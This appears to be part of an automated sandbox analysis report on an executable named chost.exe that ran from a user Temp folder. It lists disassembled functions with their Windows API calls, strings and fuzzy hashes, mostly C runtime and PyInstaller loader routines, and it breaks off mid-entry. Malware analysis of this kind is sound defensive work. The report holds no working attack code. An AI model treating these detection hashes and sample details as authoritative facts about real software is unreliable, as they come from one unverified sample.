FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B488

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction ID: c3816e7ccb4b4bd9dcc8aac9f5bf226c5acc07ae850c02c62bca5ca817c8b057
Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction Fuzzy Hash: EE113D31A0C642C1FA78A7779AD21796161DF447B4F64C3BCEABDD67D6DE2CA441C200

Function 00007FF69437B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF69437B2A5
FlsSetValue.KERNEL32 ref: 00007FF69437B2C4
FlsSetValue.KERNEL32 ref: 00007FF69437B2EC
FlsSetValue.KERNEL32 ref: 00007FF69437B2FD
FlsSetValue.KERNEL32 ref: 00007FF69437B30E

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction ID: 19b0fa22ed921aca760f9be08ab730e1ca0926be049320a6483ac4a7e6d976ec
Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction Fuzzy Hash: E3110630A0D207C5FA78627348D227E1191DF45324F58C7BCDABEDA2C2DD2DB481C241

Function 00007FF694376010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF694376176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437622C

Strings

verbose, xrefs: 00007FF694376020

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 42273c6188cbe88440b9ca7e3ba895a8a964c810ab7160691afe433292c5d24c
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 9E918B32A0CA46C5E7B59E36D4A437D36A1EB44BA4F44C17ADADAC62D6DF3CE805C301

Function 00007FF69437FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437FF17

Part of subcall function 00007FF694377AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF694377AC9

Strings

UTF-8, xrefs: 00007FF69437FE96
ccs, xrefs: 00007FF69437FE52
UTF-16LEUNICODE, xrefs: 00007FF69437FEB5

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: c110ae03df0e133b930d4504e237ea070e2f33ccaea4a1adbe7c69e3ef5f2956
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 46816B72E0C243C6FA744E3B81902792AA0FB11B48F65C0BDDA89D76DADF2DA901D741

Function 00007FF69436D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF69436D6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF69436D77A
RtlUnwindEx.KERNEL32 ref: 00007FF69436D7D4

Strings

csm, xrefs: 00007FF69436D761

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: f33db39e2dfaab69e9516923f1277f205e740758d65645103020de53731904ff
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 8851B232B296438AEB64CF26E489A387791FB44B98F14C178DA4E87748DF7CE841C700

Function 00007FF69436EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF69436EFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF69436EFF3

Strings

MOC, xrefs: 00007FF69436EFBB
RCC, xrefs: 00007FF69436EFC3

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: a931f90d961dafcbe0b4b99237eddf6433d600b5eb2293fceafd16cb6f40851d
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 48617332908BC685D7709F26E4823AAB7A0FB857D4F048269EB9D47B55DF7CD194CB00

Function 00007FF69436F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF69436F320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF69436F408

Strings

csm, xrefs: 00007FF69436F45A
csm, xrefs: 00007FF69436F342

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: a6280de1c0bab613fee23de0b9244be09294a148c034884cb2768bd479b885f6
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: 6D51603290828386EB748E37908636877A1FB55B94F249279DA5D87B99CF3CE850CB05

Function 00007FF694367E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF69436352C,?,00000000,00007FF694363F23), ref: 00007FF694367F22

Strings

%.*s, xrefs: 00007FF694367EDB
\, xrefs: 00007FF694367E87
%s%c, xrefs: 00007FF694367E94

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction ID: c785f8d82bda67997179227cf3433a2a6e8fb5056e6c619aa0187108888648f2
Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction Fuzzy Hash: 7931D421619AC245EA319B32E8917AA7354EF84BE4F448279EE6DC77C9EF2CD605C700

Function 00007FF694362810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6943628EA

Strings

Error, xrefs: 00007FF6943628DD
[PYI-%d:%ls] , xrefs: 00007FF694362868
ERROR, xrefs: 00007FF69436286F

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: fffc2b012b497ff34626e6a0aed64a935c2a092e32d121183facd13d28b4fabf
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: C921A372708B4291E7209B26F8857EA73A4EB88780F40813AEA8DD3756DE3CD649C700

Function 00007FF69437C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF69437C68F
WriteFile.KERNEL32 ref: 00007FF69437C957
WriteFile.KERNEL32 ref: 00007FF69437C99D
GetLastError.KERNEL32 ref: 00007FF69437CA53

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: abd8ef16a9b81290618f77638e7ac576d5da9cce812b5851d7f73eb9d09b65d0
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: 90D1E272B18A81CAE760CF76D4902AC37B1FB44798B44C279DE9E97B99DE38D006C740

Function 00007FF69437F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF69437FAEC
_get_daylight.LIBCMT ref: 00007FF69437FAFD
_get_daylight.LIBCMT ref: 00007FF69437FB0E
_isindst.LIBCMT ref: 00007FF69437FBD9

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 8dc9b4cff8c900db3984dc338a7f4f5afe5aceefb2a42efb15c58efbdadee18a
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 3E51C172F08112CAEB38DB7699D16BC27A1FB40358F50827DDE5ED2AE5DF38A402C600

Function 00007FF6943757EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF69437581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF694375881
GetLastError.KERNEL32 ref: 00007FF694375912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF694375724), ref: 00007FF69437595E

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: 00bf2e322935d1a5631d8eb15c954c4414da0139d4d9ff2793e7f56c777559d0
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: 78513C32E08642CAFB28DF7294903BD23A1EB49B58F148579DE8D97A89DF38D441C740

Function 00007FF6943620C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6943620F4
SetWindowLongPtrW.USER32 ref: 00007FF694362116
GetWindowLongPtrW.USER32 ref: 00007FF694362140
InvalidateRect.USER32 ref: 00007FF694362160

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 63d83a58b65f6a7f80efd341cc31b7d7991bd07e953fad8e29ae40335f5b7c24
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 4711E921A0C14782F66497BBE5C62796251EB88780F95C078EF5987B9ACD2DD491C600

Function 00007FF694385B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6943817D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF694381803

_get_daylight.LIBCMT ref: 00007FF694385CA4
_get_daylight.LIBCMT ref: 00007FF694385CB5

Strings

?, xrefs: 00007FF694385C35

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction ID: df73eabb44a2f06a033e4db1e3124a7c1a8e9c46c6ef0faa36ca5ae796876bb9
Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction Fuzzy Hash: 8041D622A1868646FB789B379485379A6B0EB90BA4F14827DEE5CC6FD5DE3CD441CB00

Function 00007FF694379084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943790B6

Part of subcall function 00007FF69437A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF69436CC15), ref: 00007FF6943790D4

Strings

C:\Users\user\AppData\Local\Temp\chost.exe, xrefs: 00007FF6943790C2

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\chost.exe
API String ID: 3580290477-1415524421
Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction ID: 52cb32b1c6c69f5e76d711e043fd5b4d94f897f6066d3ac0390ffdf6535da869
Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction Fuzzy Hash: B2414A32A0CA12C6EB24AF3799C10B86395EF457D0B55817DE98D83B86EE3DE591C340

Function 00007FF69437CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF69437CDBF
GetLastError.KERNEL32 ref: 00007FF69437CDE1

Strings

U, xrefs: 00007FF69437CD6B

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 35f69ef713e0ad9e874611a05a42db580df1e4f5096829ef7faab30f7096ebb7
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 7B418072B18A85C1DB208F36E4943A9A7A1FB88794F548039EE8DC7B98EF3CD441D740

Function 00007FF69437F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF69437F668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF69437F6BA

Strings

:, xrefs: 00007FF69437F67E

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction ID: 20678e9c3187e8d8ec10a93006553312da1a69d06d30a569badd41888879584a
Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction Fuzzy Hash: 5C219172A1C682C2FB309B26D4C426D63A1FB88B48F95C07DDA8D83695DF7CE945CB41

Function 00007FF69436FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF69436FE08
RaiseException.KERNEL32 ref: 00007FF69436FE49

Strings

csm, xrefs: 00007FF69436FE36

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
